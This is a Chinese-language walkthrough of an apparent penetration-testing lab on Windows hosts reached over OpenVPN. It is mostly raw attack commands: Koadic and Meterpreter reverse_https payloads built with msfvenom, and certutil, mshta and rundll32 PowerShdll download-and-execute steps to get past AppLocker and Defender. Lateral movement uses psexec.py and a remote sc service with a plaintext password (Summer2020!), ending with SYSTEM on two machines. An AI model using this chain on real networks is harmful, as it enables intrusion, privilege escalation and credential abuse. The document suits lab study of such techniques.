openvpn连接
https://openvpn.net/community-downloads/
https://swupdate.openvpn.org/community/releases/OpenVPN-2.5.5-I602-amd64.msi
一定要下载2.5.5版本(老版本)的,最新版不支持lab的协议。
使用最新版openvpn会报一个错TAP Mode Is Not Supported
10.100.10.240
koadic一句话上线
cmdshell 0
whoami
net user
net user victim
看到属于administrators管理员组
tasklist /svc
用avlist查看安全软件,smartscreen.exe <=> Windows Defender
尝试运行powershell
发现存在受限语言模式,不能执行powershell。报错如下,关键词 in this language mode
| #< CLIXML
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><S S="Error">Cannot set property. Property setting is supported only on core types in this language mode._x000D__x000A_</S><S S="Error">At line:1 char:1_x000D__x000A_</S><S S="Error">+ [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType ..._x000D__x000A_</S><S S="Error">+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S="Error"> + CategoryInfo : InvalidOperation: (:) [], RuntimeException_x000D__x000A_</S><S S="Error"> + FullyQualifiedErrorId : PropertySetterNotSupportedInConstrainedLanguage_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><S S="Error">new-object : Cannot create type. Only core types are supported in this language mode._x000D__x000A_</S><S S="Error">At line:1 char:84_x000D__x000A_</S><S S="Error">+ ... et.SecurityProtocolType]::Tls12;$aB2=new-object net.webclient;if([Sys ..._x000D__x000A_</S><S S="Error">+ ~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S="Error"> + CategoryInfo : PermissionDenied: (:) [New-Object], PSNotSupportedException_x000D__x000A_</S><S S="Error"> + FullyQualifiedErrorId : CannotCreateTypeConstrainedLanguage,Microsoft.PowerShell.Commands.NewObjectCommand_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S><S S="Error">Cannot invoke method. Method invocation is supported only on core types in this language mode._x000D__x000A_</S><S S="Error">At line:1 char:112_x000D__x000A_</S><S S="Error">+ ... ebclient;if([System.Net.WebProxy]::GetDefaultProxy().address -ne $nul ..._x000D__x000A_</S><S S="Error">+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S="Error"> + CategoryInfo : InvalidOperation: (:) [], RuntimeException_x000D__x000A_</S><S S="Error"> + FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S><S S="Error">new-object : Cannot create type. Only core types are supported in this language mode._x000D__x000A_</S><S S="Error">At line:1 char:294_x000D__x000A_</S><S S="Error">+ ... alCache]::DefaultCredentials;};IEX ((new-object Net.WebClient).Downlo ..._x000D__x000A_</S><S S="Error">+ ~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S="Error"> + CategoryInfo : PermissionDenied: (:) [New-Object], PSNotSupportedException_x000D__x000A_</S><S S="Error"> + FullyQualifiedErrorId : CannotCreateTypeConstrainedLanguage,Microsoft.PowerShell.Commands.NewObjectCommand_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S><S S="Error">new-object : Cannot create type. Only core types are supported in this language mode._x000D__x000A_</S><S S="Error">At line:1 char:390_x000D__x000A_</S><S S="Error">+ ... 10:8082/0hVgS0/0kvEguaIZmQ0'));IEX ((new-object Net.WebClient).Downlo ..._x000D__x000A_</S><S S="Error">+ ~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S="Error"> + CategoryInfo : PermissionDenied: (:) [New-Object], PSNotSupportedException_x000D__x000A_</S><S S="Error"> + FullyQualifiedErrorId : CannotCreateTypeConstrainedLanguage,Microsoft.PowerShell.Commands.NewObjectCommand_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S></Objs>
|
制作免杀exe
| handler -H 175.12.80.10 -P 2334 -p windows/x64/meterpreter/reverse_https
|
参考资料:https://whale3070.github.io/2021/07/09/%E9%BB%91%E5%AE%A2%E5%AD%A6%E5%BE%92%E6%97%A5%E8%AE%B0-%E5%82%80%E5%84%A1%E8%BF%9B%E7%A8%8B%E8%BF%87winDefender/
msfvenom -p windows/x64/meterpreter/reverse_https lhost=175.12.80.10 lport=2334 -f c
使用koadic文件上传模块,上传到C:\users\temp目录下
start C:\users\temp\knefsb.exe
This program is blocked by group policy.For more information, contact your system administrator.
绕过应用程序白名单
| certutil.exe -urlcache -split -f http://175.12.80.10:80/knefsb.exe & knefsb.exe
|
现在要上线msf来提权,绕过applocker
certutil.exe -urlcache -split -f http://175.12.80.10:80/knefsb.exe PowerShdll.dll
rundll32 .\PowerShdll.dll,main -i
handler -H 175.12.80.10 -P 4433 -p windows/meterpreter/reverse_https
msfvenom -p windows/meterpreter/reverse_https -a x86 -f csharp –platform windows -o out.txt -b “\x00\xff” LHOST=175.12.80.10 LPORT=4433 PrependMigrate=true PrependMigrateProc=svchost.exe
参考这篇文章,制作js文件
https://wtfsec.org/posts/%e5%85%8d%e6%9d%80-msf-windows-payload-%e7%9a%84%e6%96%b9%e6%b3%95%e4%b8%8e%e5%ae%9e%e8%b7%b5/
制作好以后,放在80端口,http://175.12.80.10/1.js
在靶机上运行mshta http://175.12.80.10/1.js
通过smb进行横向移动
python3 psexec.py victim:Summer2020\!@10.100.10.240
猜测是上传exe的时候,被组策略禁止运行了,所以没有反弹shell成功。
smbmap
做信息搜集,确定这台机器硬盘可读可写
| net use \\10.100.10.240\admin$ /user:"ELS-CHILD\victim" "Summer2020!"
sc \\10.100.10.240 create whaleReverse binpath= "C:\windows\system32\cmd.exe /c mshta http://175.12.80.10:9999/27M8t"
sc \\192.168.123.45 start whaleReverse
|
虽然上图中提示StartService failed,但是确实成功反弹shell了,并且是system权限
10.100.10.250
cd /home/kali/Documents/pentest/tool/zerologon/1472/impacket/examples/
python3 psexec.py Administrator:Summer2020!@10.100.10.250
mshta http://175.12.80.10:9999/27M8t
现在有2个机器的SYSTEM权限
参考资料